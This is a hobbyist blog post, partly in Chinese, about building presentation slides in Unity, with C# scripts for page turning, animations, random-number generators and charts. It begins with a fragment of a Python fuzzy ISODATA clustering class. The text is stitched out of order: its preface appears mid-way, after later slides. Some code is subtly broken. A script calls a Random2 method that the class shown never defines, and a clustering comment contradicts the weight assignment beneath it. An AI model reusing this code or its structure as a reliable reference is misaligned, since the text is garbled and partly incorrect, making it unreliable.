    if len(self.data) <= self.max_samples:
    return
    <color="#57a64a"># 样本数据量超过 self.max_samples 时,算法会计算所有质心点中每个维度的标准差,</color>
    <color="#57a64a"># 并筛选出其中标准差大于 self.epsilon 的质心点,即待进行拆分操作的质心点。</color>
    <color="#57a64a"># 这通过对 self.centroids 中每个质心点在各个维度上的标准差进行计算,</color>
    <color="#57a64a"># 并使用 np.where() 方法筛选出标准差大于 self.epsilon 的质心点来实现。</color>
    centroids_to_split = np.where(np.std(self.centroids, axis=1) > self.epsilon)[0]

    <color="#57a64a"># 对于每个待拆分的质心点 i</color>
    for i in centroids_to_split:
    <color="#57a64a"># 算法会在该质心点的位置插入一个新的质心点 i+1。</color>
    <color="#57a64a"># 具体地,代码使用新质心点的计算公式,即当前质心坐标加上一个随机扰动,生成一个新的质心坐标</color>
    new_centroid = self.centroids[i] + self.alpha * np.std(self.data, axis=0)[i] * np.random.randn(len(self.data[0]))
    <color="#57a64a"># 使用 np.insert() 方法将这个新的质心坐标插入到 self.centroids 数组中第 i+1 个位置</color>
    self.centroids = np.insert(self.centroids, i + 1, new_centroid, axis=0)

    <color="#57a64a"># 根据每个簇的权重信息,对新拆分出来的簇进行样本分配</color>
    <color="#57a64a"># 对于拆分出来的两个簇 i 和 i+1,算法会将原来被分配到第 i 个簇中的数据样本重新分配到距离它更近的质心中</color>
    mask = self.weights[:, i] > 0
    <color="#57a64a"># 对 self.weights 矩阵中被分配到第 i 个簇中的样本进行筛选</color>
    self.weights[mask, i] = self.beta
    <color="#57a64a"># 将它们的权重值从原来的 self.beta 修改为 1 - self.beta(即从属度由原来的较弱变为较强),</color>
    <color="#57a64a"># 同时将它们的权重值从第 i+1 个簇中原来的 0 修改为 1 - self.beta</color>
    self.weights[mask, i+1] = 1 - self.beta

    <color="#57a64a"># 将簇的数量 self.k 加一,表示新拆分出来的簇已经被计入簇的总数中</color>
    self.k += 1

    <color="#dcdcaa">def fit(self)</color>:
    self.initialize()

    for i in range(self.max_iter):
    self.update_weights()
    self.update_centroids()
    self.update_k()

    <color="#dcdcaa">def predict(self, data)</color>:
    <color="#57a64a"># 输入一组新的数据样本 data,算法会计算出这些样本点与所有质心点之间的距离,</color>
    <color="#57a64a"># 并对每个簇的权重进行计算。最终,算法会将所有数据样本分配到权重最大的簇中</color>
    weights = np.zeros((len(data), self.k))
    for j in range(self.k):
    <color="#57a64a"># 使用 np.linalg.norm() 方法计算 data 与第 j 个质心点的欧几里得距离</color>
    dist = np.linalg.norm(data - self.centroids[j], axis=1)
    <color="#57a64a"># 使用 np.mean() 方法计算所有样本点与该质心点之间的平均距离 mean_dist</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 计算样本点与平均距离之间的标准差 std_dev</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))
    <color="#57a64a"># 使用高斯核函数(Gaussian Kernel)计算每个样本分别属于第 j 个簇的概率</color>
    weights[:, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#57a64a"># 算法选取每个样本点分别属于哪个簇的权重值最大,即使用 argmax() 方法在 weights 矩阵的第二个轴上取最大值所在的索引</color>
    return weights.argmax(axis=1)

    <color="#FF8800">import matplotlib.pyplot as plt</color>
    <color="#FF8800">from sklearn.datasets import make_blobs</color>

    <color="#57a64a"># 生成一些随机的数据点</color>
    data, _ = make_blobs(n_samples=1000, centers=3, n_features=2, random_state=42)

    <color="#57a64a"># 使用模糊 ISODATA 算法聚类数据</color>
    fisodata = FuzzyISODATA(data, k=3, max_iter=20)
    fisodata.fit()
    labels = fisodata.predict(data)

    <color="#57a64a"># 将聚类结果可视化</color>
    plt.scatter(data[:, 0], data[:, 1], c=labels)
    plt.show()

(Image: slide 7)

    SynthText3D

(Image)

The layout is text on the left, image on the right. Color scheme:

• Background: #312E2B
• Text:
  • Green: #92E86C
  • Red: #FF8080
  • Cyan: #00FFFF

I wrote logic to swap the mouse cursor, but it never took effect after building. RIP!

    using UnityEngine;

    public class ChangeCursor : MonoBehaviour
    {
    public Texture2D cursorTexture;
    // Start is called before the first frame update
    void Start()
    {
    Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    }
    }
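
My guess in hindsight (unverified): Cursor.SetCursor with CursorMode.Auto uses a hardware cursor, and Unity expects the texture to be imported with its Texture Type set to Cursor for that to work in a player build, which would explain why it worked in the editor but not after building.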

(Image)

Hierarchy/Project layout: the slide indices on the left run consecutively, but the right-hand panels don't, so each right-hand GameObject carries a SceneID component that ties it to the matching left-hand slide.

    using UnityEngine;

    public class SceneID : MonoBehaviour
    {
    public int ID = 0;
    }

    ​写了个 ScenesController 类用于控制翻页。

    • 按下 左/A 键向前翻页,执行 privousScene()
    • 按下 右/D 键向后翻页,执行 nextScene()
    • playAnimation() 掌管翻页动画,使用 Dotween 插件。
    using System.Collections;
    using System.Collections.Generic;
    using Unity.VisualScripting;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private Transform leftScenesParent;
    private List<Transform> leftScenes = new List<Transform>();
    [SerializeField] private Transform rightScenesParent;
    private List<Transform> rightScenes = new List<Transform>();

    private int currentRightScene = 0;
    private int oldRightScene = 0;
    private int currentLeftScene = 0;
    private int oldLeftScene = 0;
    [SerializeField] private Text sceneIndexUI;
    private bool allowChange = true;

    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < leftScenesParent.childCount; i++)
    {
    leftScenes.Add(leftScenesParent.GetChild(i));
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;

    for (int i = 0; i < rightScenesParent.childCount; i++)
    {
    rightScenes.Add(rightScenesParent.GetChild(i));
    rightScenes[i].localPosition = new Vector3(0, 1440, 0);
    }
    leftScenes[0].localPosition = Vector3.zero;
    rightScenes[0].localPosition = Vector3.zero;

    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;
    }

    // Update is called once per frame
    void Update()
    {
    if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
    {
    privousScene();
    }
    if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
    {
    nextScene();
    }
    }

    private void privousScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("privousScene()");
    oldLeftScene = currentLeftScene;
    if (currentLeftScene == 0)
    currentLeftScene = leftScenes.Count - 1;
    else
    currentLeftScene -= 1;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void nextScene()
    {
    if (allowChange)
    {
    allowChange = false;
    Debug.Log("nextScene()");
    oldLeftScene = currentLeftScene;
    currentLeftScene = (currentLeftScene + 1) % leftScenes.Count;
    sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

    playAnimation();
    }
    }
    private void playAnimation()
    {
    oldRightScene = currentRightScene;
    if (rightScenes[rightScenes.Count - 1].GetComponent<SceneID>().ID <= currentLeftScene)
    {
    currentRightScene = rightScenes.Count - 1;
    }
    else
    {
    for (int i = 0; i < rightScenes.Count - 1; i++)
    {
    if (rightScenes[i].GetComponent<SceneID>().ID <= currentLeftScene && rightScenes[i + 1].GetComponent<SceneID>().ID > currentLeftScene)
    {
    currentRightScene = i;
    }
    }
    }

    Tweener tweenerLeftOut = null;
    Tweener tweenerRightOut = null;
    if (oldLeftScene > currentLeftScene)
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(-1440, 1);
    }
    else
    {
    tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(1440, 1);
    }
    if (oldRightScene > currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(1440, 1);
    }
    else if (oldRightScene < currentRightScene)
    {
    tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(-1440, 1);
    }

    leftScenes[currentLeftScene].gameObject.SetActive(true);
    rightScenes[currentRightScene].gameObject.SetActive(true);
    Tweener tweenerLeftIn = leftScenes[currentLeftScene].DOLocalMoveY(0, 1);
    Tweener tweenerRightIn = null;
    if (currentRightScene != oldRightScene)
    {
    tweenerRightIn = rightScenes[currentRightScene].DOLocalMoveY(0, 1);
    }
    Debug.Log("currentRightScene: " + currentRightScene + " oldRightScene: " + oldRightScene + " currentLeftScene: " + currentLeftScene + " oldLeftScene" + oldLeftScene);
    tweenerLeftIn.OnComplete(() =>
    {
    for (int i = 0; i < leftScenes.Count; i++)
    {
    if (i > currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    else if (i < currentLeftScene)
    {
    leftScenes[i].localPosition = new Vector3(0, 1440, 0);
    leftScenes[i].gameObject.SetActive(false);
    }
    }
    allowChange = true;
    });
    }
}

The animation code for revealing images one after another; I think this one ended up scrapped.

    using System.Collections;
    using System.Collections.Generic;
    using System.Linq;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;

    public class ShowPictures : MonoBehaviour
    {
    [SerializeField] private Transform imagesParent;
    private List<Image> images = new List<Image>();
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < imagesParent.childCount; i++)
    {
    images.Add(imagesParent.GetChild(i).GetComponent<Image>());
    images[i].color = new Color(images[i].color[0], images[i].color[1], images[i].color[2], 0);
    }
    showPictures(0);
    }

    private void showPictures(int i)
    {
    if (i < images.Count)
    {
    Tweener tweener = images[i].DOFade(1, 0.5f);
    tweener.OnComplete(()=> showPictures(i + 1));
    }

    }
}

The classic color-cycling animation code in honor of Wei-ge:

    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;
    // Start is called before the first frame update
    void Start()
    {
    if (isImage)
    {
    image = GetComponent<Image>();
    float H, S, V;
    Color.RGBToHSV(image.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    else
    {
    text = GetComponent<Text>();
    float H, S, V;
    Color.RGBToHSV(text.color, out H, out S, out V);
    changeColor(H, S, V);
    }
    }

    private void changeColor(float H, float S, float V)
    {
    float newH = H + 0.01f;
    if (newH > 1)
    {
    newH = 0;
    }
    Tweener tweener = null;
    if (isImage)
    {
    tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
    else
    {
    tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
    }
// Color.HSVToRGB above converts the shifted hue back to RGB for the tween
    tweener.OnComplete(()=> changeColor(newH, S, V));
    }
}

There was supposed to be a button that played a Hokkien clip wishing Wei-ge a happy birthday, but for some reason it wouldn't trigger during the presentation……

    using UnityEngine;
    using UnityEngine.UI;

    public class PlaySounds : MonoBehaviour
    {
    public AudioClip soundClip;
    private AudioSource audioSource;

    private void Start()
    {
// grab the AudioSource attached to this button
    audioSource = GetComponent<AudioSource>();
    if (audioSource == null)
    {
// if the button has no AudioSource, add one
    audioSource = gameObject.AddComponent<AudioSource>();
    }

// assign the audio clip to the AudioSource
    audioSource.clip = soundClip;

// make sure the button has a click handler and register PlaySound() as the response
    Button button = GetComponent<Button>();
    button.onClick.AddListener(PlaySound);
    }

// plays the sound
    private void PlaySound()
    {
    Debug.Log("Play Sound!");
    audioSource.Play();
    }
    }

Preface

Let's look back at the PPTs I once built with Unity! It's been so long since I last used it that everything feels familiar yet foreign.

Main content

Random numbers

Created right after I started school, when the COVID lockdown kept us in the dorms but class presentations still had to happen online!

(Image: slide 1)

Scene switcher

(Image)

    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.SceneManagement;
    using UnityEngine.UI;

    public class ScenesController : MonoBehaviour
    {
    [SerializeField] private GameObject scenesControllerUIPrefab;
    [SerializeField] private GameObject leftUIPrefab;
    [SerializeField] private GameObject rightUIPrefab;
    private int scenesNum = 6;
    private int sceneIndex = 1;
    public static ScenesController instance;
    private GameObject UIGameObject;
    private GameObject leftUIGameObject;
    private GameObject rightUIGameObject;

    private bool enterScene = false;
    private bool exitScene = false;
    private float timer = 2f;
    private float waitTime = 1f;
    private float enterSceneTime = 1f;
    private float exitSceneTime = 1f;
// Awake is called when the script instance is being loaded
    void Awake()
    {
    if (FindObjectsOfType<ScenesController>().Length > 1)
    {
    Destroy(gameObject);
    return;
    }
    instance = this;
    DontDestroyOnLoad(gameObject);
    initUI();
    // enterScene = true;
    }

    void Update()
    {
    if (!GameObject.Find("Canvas").transform.Find("ScenesControllerUI"))
    {
    timer = enterSceneTime + waitTime;
    initUI();
    // enterScene = true;
    }
    }

    private void initUI()
    {
    Debug.Log("initUI()");
    UIGameObject = Instantiate(scenesControllerUIPrefab);
    UIGameObject.name = "ScenesControllerUI";
    UIGameObject.transform.SetParent(GameObject.Find("Canvas").transform);
    UIGameObject.transform.Find("PriorBtn").GetComponent<Button_UI>().ClickFunc = () => { onPriorBtn(); };
    UIGameObject.transform.Find("NextBtn").GetComponent<Button_UI>().ClickFunc = () => { onNextBtn(); };
    UIGameObject.transform.Find("Text").GetComponent<Text>().text = sceneIndex + "/" + scenesNum;
    }

    private void onNextBtn()
    {
    sceneIndex++;
    if (sceneIndex == scenesNum + 1)
    sceneIndex = 1;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }

    private void onPriorBtn()
    {
    sceneIndex--;
    if (sceneIndex == 0)
    sceneIndex = scenesNum;
    //timer = exitSceneTime;
    //exitScene = true;
    SceneManager.LoadScene(sceneIndex.ToString());
    }
    }

The spinning wheel

Each slide is its own Scene; a scene switcher marked DontDestroyOnLoad(gameObject); survives scene loads and swaps between them.

(Image)

A spinning wheel driven by an Animation component.

(Image: slide 2)

Math formulas

The math formulas are displayed as images exported from the online LaTeX editor (latexlive.com).

Scrolling code

(Image)

A big wall of code wouldn't fit on one slide, so I designed a scroll box for it.
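
The original scroll-box code isn't included here, so this is only a minimal sketch of the idea, assuming a masked viewport with the tall code Text as a child (all names hypothetical):

    using UnityEngine;

    public class CodeScroller : MonoBehaviour
    {
        [SerializeField] private RectTransform content;   // the tall code Text
        [SerializeField] private float viewportHeight = 600f;
        [SerializeField] private float scrollSpeed = 80f;

        private void Update()
        {
            float wheel = Input.GetAxis("Mouse ScrollWheel");
            if (wheel == 0f) return;

            // move the content against the wheel and clamp it to the overflow range
            Vector2 pos = content.anchoredPosition;
            pos.y = Mathf.Clamp(pos.y - wheel * scrollSpeed, 0f, Mathf.Max(0f, content.rect.height - viewportHeight));
            content.anchoredPosition = pos;
        }
    }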

    <color="#3f93c2">using</color> System;

    <color="#3f93c2">public class</color> <color="#4ec9b0">RandomNumber</color>
    {
    <color="#3f93c2">private ulong</color> maxshort =<color="#b5cea8"> 65536L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">multiplier</color> = <color="#b5cea8">1194211693L</color>;
    <color="#3f93c2">private ulong</color> <color="#ffc0c0">adder</color> = <color="#b5cea8">12345L</color>;
    <color="#3f93c2">private ulong </color><color="#ffc0c0">randSeed</color>;

    <color="#588841">/// <summary>
    /// 构造函数
    /// </summary></color>
    <color="#3f93c2">public</color> <color="#4ec9b0">RandomNumber</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">multiplier</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">adder</color>, <color="#3f93c2">ulong</color> <color="#93d9fe">randSeed</color> = <color="#b5cea8">0</color>)
    {
    <color="#3f93c2">this</color>.multiplier = <color="#93d9fe">multiplier</color>;
    <color="#3f93c2">this</color>.adder = <color="#93d9fe">adder</color>;
    <color="#d8a0df">if</color> (<color="#93d9fe">randSeed</color> == <color="#b5cea8"> 0</color>)
    <color="#57a648">// 返回自 1970-01-01T00:00:00.000Z 起已经过的毫秒数。</color>
    <color="#3f93c2">this</color>.randSeed = (<color="#3f93c2">ulong</color>)<color="#63ba86">DateTime</color>.Now.<color="#dcdcaa">ToFileTimeUtc</color>();
    <color="#d8a0df">else</color>
    <color="#3f93c2">this</color>.randSeed = <color="#93d9fe">randSeed</color>;
    }

    <color="#588841">/// <summary>
    /// 产生 0 到 n - 1 之间的随机整数
    /// 每次计算时, 用线性同余式计算新的种子 randSeed,
    /// 其高 16 为的随机性较好
    /// 此时得到一个 0 ~ 65535 之间的随机整数,
    /// 再将此随机整数映射到 0 ~ n - 1 范围内.
    /// </summary>
    /// <param </color>name<color="#588841">=</color>"<color="#93d9fe">n</color>"<color="#588841">>产生的随机整数上限</param>
    /// <returns>产生的随机整数</returns></color>
    <color="#3f93c2">public ushort</color> <color="#dcdcaa">Random</color>(<color="#3f93c2">ulong</color> <color="#93d9fe">n</color>)
    {
    randSeed = multiplier * randSeed + adder;
    <color="#d8a0df">return</color> (<color="#3f93c2">ushort</color>)((randSeed >> <color="#b5cea8">48</color>) % <color="#93d9fe">n</color>); <color="#57a648">// 取高 16 位</color>
    }

    <color="#588841">/// <summary>
    /// 产生 [0, 1) 之间的随机浮点数
    /// </summary>
    /// <returns>产生的随机浮点数</returns></color>
    <color="#3f93c2">public double</color> <color="#dcdcaa">fRandom</color>()
    {
    <color="#d8a0df">return</color> <color="#dcdcaa">Random</color>(maxshort) / (<color="#3f93c2">double</color>)maxshort;
    }
}

To get the syntax highlighting, I filled in the rich-text tags one by one…

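For reference, the generator on that slide is a textbook linear congruential generator: with multiplier a = 1194211693, increment c = 12345, and the ulong arithmetic wrapping modulo 2^64, each call computes

$$x_{k+1} = (a\,x_k + c) \bmod 2^{64}, \qquad r = \left\lfloor x_{k+1} / 2^{48} \right\rfloor \bmod n,$$

that is, the new seed's top 16 bits (the ones with the best randomness) are extracted and then mapped into 0..n-1 by the final modulo.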
[screenshot: slide 3]

Generating Random Numbers

I threw together a Scene3Controller class to drive all the logic in this scene; it has a bit of a spaghetti-pile flavor:

• A clock that ticks over in Update()
• Following the textbook, random numbers are built from randSeed, multiplier, adder, and n.
• The random numbers are printed to the screen one line every half second; to get that effect I even had to ask 小迷糊 for help and ended up using a coroutine (IEnumerator), something that was a one-liner back in RMXP, orz.
    using CodeMonkey.Utils;
    using System.Collections;
    using System.Collections.Generic;
    using System.Reflection;
    using UnityEngine;
    using UnityEngine.UI;

    public class Scene3Controller : MonoBehaviour
    {
    [SerializeField] private GameObject inputField;
    [SerializeField] private Button_UI startBtn;
    [SerializeField] private Image startImage;
    [SerializeField] private Image stopImage;
    [SerializeField] private Text screenText;
    [SerializeField] private RectTransform clockPointer;

    private RandomNumber randomNumber = null;
    private ulong multiplier = 1194211693L;
    private ulong adder = 12345L;
    private ulong randSeed = 0;
    private ulong n = 65536L;

    private bool running = false;
    private float timer = 0;

    // Start is called before the first frame update
    void Awake()
    {
    screenText.text = "";
    inputField.transform.Find("randSeed").GetComponent<InputField>().text = "" + randSeed;
    inputField.transform.Find("multiplier").GetComponent<InputField>().text = "" + multiplier;
    inputField.transform.Find("adder").GetComponent<InputField>().text = "" + adder;
    inputField.transform.Find("n").GetComponent<InputField>().text = "" + n;

    startBtn.ClickFunc = () => {
    if (running)
    {
    StopCoroutine("TestProgram");
    }
    else
    {
    try
    {
    multiplier = ulong.Parse(inputField.transform.Find("multiplier").GetComponent<InputField>().text);
    adder = ulong.Parse(inputField.transform.Find("adder").GetComponent<InputField>().text);
    randSeed = ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text);
    n = ulong.Parse(inputField.transform.Find("n").GetComponent<InputField>().text);
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    catch
    {
    Debug.Log("失败!");
    randomNumber = new RandomNumber(multiplier, adder, randSeed);
    }
    startBtn.hoverBehaviour_Image = stopImage;
    StartCoroutine("TestProgram");
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    };
    }

    // Update is called once per frame
    void Update()
    {
    try
    {
    if (ulong.Parse(inputField.transform.Find("randSeed").GetComponent<InputField>().text) == 0)
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(1, 0.75f, 0.75f);
    }
    else
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }
    }
    catch
    {
    inputField.transform.Find("randSeed").Find("Text").GetComponent<Text>().color = new Color(181f / 255f, 206f / 255f, 168 / 255f);
    }

    if(timer<1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    clockPointer.Rotate(new Vector3(0, 0, -90));
    }

    }

    /// <summary>
    /// 测试程序
    /// </summary>
    private IEnumerator TestProgram()
    {
    screenText.text = "";
    for (int i=0;i<10;i++)
    {
    screenText.text += "a<size=20>"+ i + "</size>=" + randomNumber.Random2(n) + "\n";
    yield return new WaitForSeconds(.5f);
    }
    stopImage.gameObject.SetActive(!running);
    startImage.gameObject.SetActive(running);
    running = !running;
    }
    }

[screenshot: slide 4]

The Middle-Square Method

A middle-square method written after the textbook; the middle part of each number is highlighted in blue.

[screenshot]

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;

    public class MiddleSquareMethod : MonoBehaviour
    {
    private int length = 6;
    private ulong num = 675248L;
    private string str = "";
    private Text text;
    private float timer = 0;
    // Start is called before the first frame update
    void Awake()
    {
    text = GetComponent<Text>();
    }

    // Update is called once per frame
    void Update()
    {
    if(timer < 1f)
    {
    timer += Time.deltaTime;
    }
    else
    {
    timer = 0f;
    str = "";
    for (int i = 0; i < 2 * length - (num * num).ToString().Length; i++)
    {
    str += "0";
    }
    Debug.Log(str);
    str += (num * num).ToString();
    num = ulong.Parse(str.Substring(length / 2, length));
    text.text = str.Substring(0, length / 2) + "<color=\"#0000ff\">" + str.Substring(length / 2, length) + "</color>" + str.Substring(3 * length / 2, length / 2);
    }
    }
    }
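One concrete iteration of the code above, starting from the initial value num = 675248 with length = 6:

$$675248^2 = 455959861504 \;\Rightarrow\; 455\,|\,959861\,|\,504,$$

the square is zero-padded on the left to 2 × 6 digits if needed, the middle six digits 959861 become the next num (and are the span rendered in blue), and the whole step repeats roughly once per second.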

[screenshot: slide 5]

Data Visualization

A line-chart and bar-chart gadget for Unity, put together from Create a Graph - Unity Tutorial - YouTube.

[screenshot]

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using CodeMonkey.Utils;

    public class Window_Graph : MonoBehaviour {

    public static Window_Graph instance;

    [SerializeField] private Sprite dotSprite;
    private RectTransform graphContainer;
    private RectTransform labelTemplateX;
    private RectTransform labelTemplateY;
    private RectTransform dashContainer;
    private RectTransform dashTemplateX;
    private RectTransform dashTemplateY;
    private List<GameObject> gameObjectList;
    private List<IGraphVisualObject> graphVisualObjectList;
    private GameObject tooltipGameObject;
    private List<RectTransform> yLabelList;

    // Cached values
    public List<int> valueList;
    private IGraphVisual graphVisual;
    private int maxVisibleValueAmount;
    private Func<int, string> getAxisLabelX;
    private Func<float, string> getAxisLabelY;
    private float xSize;
    [SerializeField] private bool startYScaleAtZero = true;

    private void Awake() {
    instance = this;
    // Grab base objects references
    graphContainer = transform.Find("graphContainer").GetComponent<RectTransform>();
    labelTemplateX = graphContainer.Find("labelTemplateX").GetComponent<RectTransform>();
    labelTemplateY = graphContainer.Find("labelTemplateY").GetComponent<RectTransform>();
    dashContainer = graphContainer.Find("dashContainer").GetComponent<RectTransform>();
    dashTemplateX = dashContainer.Find("dashTemplateX").GetComponent<RectTransform>();
    dashTemplateY = dashContainer.Find("dashTemplateY").GetComponent<RectTransform>();
    tooltipGameObject = graphContainer.Find("tooltip").gameObject;

    gameObjectList = new List<GameObject>();
    yLabelList = new List<RectTransform>();
    graphVisualObjectList = new List<IGraphVisualObject>();

    IGraphVisual lineGraphVisual = new LineGraphVisual(graphContainer, dotSprite, Color.green, new Color(1, 1, 1, .5f));
    IGraphVisual barChartVisual = new BarChartVisual(graphContainer, Color.white, .8f);

    // Set up buttons
    transform.Find("barChartBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(barChartVisual);
    };
    transform.Find("lineGraphBtn").GetComponent<Button_UI>().ClickFunc = () => {
    SetGraphVisual(lineGraphVisual);
    };

    HideTooltip();

    //// Set up base values
    List<int> valueList = new List<int>() { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    ShowGraph(valueList, barChartVisual, -1, (int _i) => "" + (_i), (float _f) => "" + Mathf.RoundToInt(_f));

    }

    public static void ShowTooltip_Static(string tooltipText, Vector2 anchoredPosition) {
    instance.ShowTooltip(tooltipText, anchoredPosition);
    }

    private void ShowTooltip(string tooltipText, Vector2 anchoredPosition) {
    // Show Tooltip GameObject
    tooltipGameObject.SetActive(true);

    tooltipGameObject.GetComponent<RectTransform>().anchoredPosition = anchoredPosition;

    Text tooltipUIText = tooltipGameObject.transform.Find("text").GetComponent<Text>();
    tooltipUIText.text = tooltipText;

    float textPaddingSize = 4f;
    Vector2 backgroundSize = new Vector2(
    tooltipUIText.preferredWidth + textPaddingSize * 2f,
    tooltipUIText.preferredHeight + textPaddingSize * 2f
    );

    tooltipGameObject.transform.Find("background").GetComponent<RectTransform>().sizeDelta = backgroundSize;

    // UI Visibility Sorting based on Hierarchy, SetAsLastSibling in order to show up on top
    tooltipGameObject.transform.SetAsLastSibling();
    }

    public static void HideTooltip_Static() {
    instance.HideTooltip();
    }

    private void HideTooltip() {
    tooltipGameObject.SetActive(false);
    }

    private void SetGetAxisLabelX(Func<int, string> getAxisLabelX) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGetAxisLabelY(Func<float, string> getAxisLabelY) {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, getAxisLabelY);
    }

    private void IncreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount + 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void DecreaseVisibleAmount() {
    ShowGraph(this.valueList, this.graphVisual, this.maxVisibleValueAmount - 1, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void SetGraphVisual(IGraphVisual graphVisual) {
    ShowGraph(this.valueList, graphVisual, this.maxVisibleValueAmount, this.getAxisLabelX, this.getAxisLabelY);
    }

    private void ShowGraph(List<int> valueList, IGraphVisual graphVisual, int maxVisibleValueAmount = -1, Func<int, string> getAxisLabelX = null, Func<float, string> getAxisLabelY = null) {
    this.valueList = valueList;
    this.graphVisual = graphVisual;
    this.getAxisLabelX = getAxisLabelX;
    this.getAxisLabelY = getAxisLabelY;

    if (maxVisibleValueAmount <= 0) {
    // Show all if no amount specified
    maxVisibleValueAmount = valueList.Count;
    }
    if (maxVisibleValueAmount > valueList.Count) {
    // Validate the amount to show the maximum
    maxVisibleValueAmount = valueList.Count;
    }

    this.maxVisibleValueAmount = maxVisibleValueAmount;

    // Test for label defaults
    if (getAxisLabelX == null) {
    getAxisLabelX = delegate (int _i) { return _i.ToString(); };
    }
    if (getAxisLabelY == null) {
    getAxisLabelY = delegate (float _f) { return Mathf.RoundToInt(_f).ToString(); };
    }

    // Clean up previous graph
    foreach (GameObject gameObject in gameObjectList) {
    Destroy(gameObject);
    }
    gameObjectList.Clear();
    yLabelList.Clear();

    foreach (IGraphVisualObject graphVisualObject in graphVisualObjectList) {
    graphVisualObject.CleanUp();
    }
    graphVisualObjectList.Clear();

    graphVisual.CleanUp();

    // Grab the width and height from the container
    float graphWidth = graphContainer.sizeDelta.x;
    float graphHeight = graphContainer.sizeDelta.y;

    float yMinimum, yMaximum;
    CalculateYScale(out yMinimum, out yMaximum);

    // Set the distance between each point on the graph
    xSize = graphWidth / (maxVisibleValueAmount + 1);

    // Cycle through all visible data points
    int xIndex = 0;
    for (int i = Mathf.Max(valueList.Count - maxVisibleValueAmount, 0); i < valueList.Count; i++) {
    float xPosition = xSize + xIndex * xSize;
    float yPosition = ((valueList[i] - yMinimum) / (yMaximum - yMinimum)) * graphHeight;

    // Add data point visual
    string tooltipText = getAxisLabelY(valueList[i]);
    IGraphVisualObject graphVisualObject = graphVisual.CreateGraphVisualObject(new Vector2(xPosition, yPosition), xSize, tooltipText);
    graphVisualObjectList.Add(graphVisualObject);

    // Duplicate the x label template
    RectTransform labelX = Instantiate(labelTemplateX);
    labelX.SetParent(graphContainer, false);
    labelX.gameObject.SetActive(true);
    labelX.anchoredPosition = new Vector2(xPosition, -7f);
    labelX.GetComponent<Text>().text = getAxisLabelX(i);
    gameObjectList.Add(labelX.gameObject);

    // Duplicate the x dash template
    RectTransform dashX = Instantiate(dashTemplateX);
    dashX.SetParent(dashContainer, false);
    dashX.gameObject.SetActive(true);
    dashX.anchoredPosition = new Vector2(xPosition, -3f);
    gameObjectList.Add(dashX.gameObject);

    xIndex++;
    }

    // Set up separators on the y axis
    int separatorCount = 10;
    for (int i = 0; i <= separatorCount; i++) {
    // Duplicate the label template
    RectTransform labelY = Instantiate(labelTemplateY);
    labelY.SetParent(graphContainer, false);
    labelY.gameObject.SetActive(true);
    float normalizedValue = i * 1f / separatorCount;
    labelY.anchoredPosition = new Vector2(-7f, normalizedValue * graphHeight);
    labelY.GetComponent<Text>().text = getAxisLabelY(yMinimum + (normalizedValue * (yMaximum - yMinimum)));
    yLabelList.Add(labelY);
    gameObjectList.Add(labelY.gameObject);

    // Duplicate the dash template
    RectTransform dashY = Instantiate(dashTemplateY);
    dashY.SetParent(dashContainer, false);
    dashY.gameObject.SetActive(true);
    dashY.anchoredPosition = new Vector2(-4f, normalizedValue * graphHeight);
    gameObjectList.Add(dashY.gameObject);
    }
    }

